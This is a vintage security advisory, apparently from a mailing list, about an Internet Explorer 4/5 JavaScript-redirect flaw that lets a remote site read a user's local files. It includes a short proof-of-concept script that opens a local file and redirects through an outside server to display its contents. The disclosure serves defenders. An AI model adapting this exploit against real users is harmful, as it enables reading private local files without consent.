Internet Explorer vulnerable to a 'JavaScript redirect' bug that
allows
reading of local files
----------------------------------------------------------------------------
----
SUMMARY
Internet Explorer 4.01 and 5.0 are vulnerable to a redirect attack that
allows malicious web site operators to local read files of users using
Internet Explorer 5 with JavaScript enabled.
Microsoft is aware of this issue, but has not released a patch for this
vulnerability yet.
DETAILS
A remote web site can retrieve the contents of local text files on the
user's computer, using a URL redirect to a JavaScript code. This bypasses
domain restriction and execute the script under elevated permissions.
Exploit Code
The following exploit code lets you create a text file, and then lets the
remote server read this file:
<SCRIPT>
alert("Create a short text file C:\\TEST.TXT and it will be read and
shown in a dialog box");
a=window.open("file://c:/test.txt");
a.location="http://www.nat.bg/~joro/reject.cgi?jsredir1";
</SCRIPT>
// "http://www.nat.bg/~joro/reject.cgi?jsredir1" just does a HTTP
redirect to: "javascript:alert(document.body.innerText)"
Fix Information
Microsoft has not issued a patch for this problem yet. The suggested
workaround is to disable JavaScript in the Internet zone.
ADDITIONAL INFORMATION
This vulnerabilities (like most IE related security holes) was discovered
by: <mailto:[EMAIL PROTECTED]> Georgi Guninski
Microsoft has issued a security advisory on this issue which can be found
at: <http://www.microsoft.com/security/bulletins/MS99-043faq.asp>
http://www.microsoft.com/security/bulletins/MS99-043faq.asp
========================================
-------
AFLHI 058009990407128029/089802
milis ini didukung oleh :
>> http://www.indolinux.com - dunia linux indonesia
-------------------------------------------------------------------
untuk berhenti kirim email ke [EMAIL PROTECTED]
untuk melihat peraturan kirim email ke [EMAIL PROTECTED]
arsip berada di http://www.mail-archive.com/[email protected]
